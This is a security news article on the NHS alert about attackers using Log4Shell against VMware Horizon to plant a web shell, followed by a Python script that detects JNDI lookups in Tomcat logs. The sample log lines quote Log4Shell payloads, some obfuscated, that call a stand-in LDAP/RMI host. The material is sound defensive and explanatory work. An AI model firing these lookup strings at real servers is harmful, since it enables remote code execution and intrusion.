The National Health Service (NHS) in the United Kingdom has issued a cyber alert warning that an unknown threat actor is exploiting the Log4Shell vulnerability to attack VMware Horizon systems. Log4Shell is the name given to exploitation of CVE-2021-44228, a critical arbitrary remote code execution flaw in Apache Log4j 2.14 that has been actively exploited since December 2021.
Apache has since released security updates that resolve this and four further vulnerabilities, and Log4j version 2.17.1 is now considered safe. According to the NHS notification, the actor is using the exploit to gain remote code execution on vulnerable, publicly exposed VMware Horizon deployments.
“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface™ (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” explains the alert.
Once a vulnerable host has been identified, the attack uses the Lightweight Directory Access Protocol (LDAP) to retrieve and launch a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service. The attacker can then use the web shell to carry out a variety of malicious operations, such as deploying additional malware, exfiltrating data, or distributing ransomware.
The actor is taking advantage of the Log4Shell-vulnerable Apache Tomcat server embedded within VMware Horizon. Exploitation starts with the widely seen “${jndi:ldap://example.com}” payload, which causes Tomcat to launch a PowerShell script. That script queries Win32 services for the ‘VMBlastSG’ service, retrieves its installation path, drops a listener into ‘absg-worker.js’, and then restarts the service to activate the implant.
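Because the chain above begins with a JNDI lookup string arriving in a request that Log4j then logs, the earliest place a defender can spot it is in the Tomcat access log. The following is an added detection example, not code from the NHS alert or from VMware: it URL-decodes each log line, collapses the common Log4j lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) that attackers use to hide the literal string “jndi”, and reports every JNDI lookup with its client IP and protocol. The log lines, IP addresses and hostnames are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat-style access-log lines (sample data, not from the NHS alert).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jan/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Jan/2022:10:01:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://example.com/a}"
10.0.0.9 - - [11/Jan/2022:10:01:09 +0000] "GET /portal/info.jsp?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fexample.com%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.12 - - [11/Jan/2022:10:02:00 +0000] "POST /portal/login HTTP/1.1" 302 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://example.com/c}"
"""

# Log4j lookup tricks commonly used to hide the literal string "jndi":
#   ${lower:j} / ${upper:j}  -> the wrapped character
#   ${::-j} / ${env:X:-j}    -> the default value after ":-"
OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*?:-([^{}]*)\}", re.I)

# A JNDI lookup using any of the protocols the lookup can resolve.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:[^{}]*?\}", re.I)


def normalize(text: str) -> str:
    """URL-decode (at most twice) and collapse nested lookup obfuscations."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:  # repeat until no obfuscation wrapper remains
        collapsed = OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if collapsed == text:
            return text
        text = collapsed


def find_jndi_lookups(log_text: str) -> list:
    """Return (client_ip, protocol, normalized_payload) for every JNDI lookup seen."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client_ip = line.split(" ", 1)[0]  # first field of the combined log format
        for match in JNDI.finditer(normalize(line)):
            hits.append((client_ip, match.group(1).lower(), match.group(0)))
    return hits


if __name__ == "__main__":
    for ip, proto, payload in find_jndi_lookups(SAMPLE_LOG):
        print(f"{ip}\t{proto}\t{payload}")
```

Any hit is worth triaging even if the response code was 404, since Log4j logs the request regardless of whether the resource existed.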
The listener is then responsible for executing arbitrary commands that it receives over HTTP/HTTPS in request headers accompanied by a hardcoded string. Having established persistent, reliable communication with the command-and-control (C2) server, the actor can then exfiltrate data, execute commands, or deploy ransomware.
Threat actors targeting VMware Horizon aren’t the only ones leveraging the Log4j vulnerability. The Conti ransomware operation is also using Log4Shell to propagate laterally to unprotected VMware vCenter servers, making it easier to encrypt virtual machines.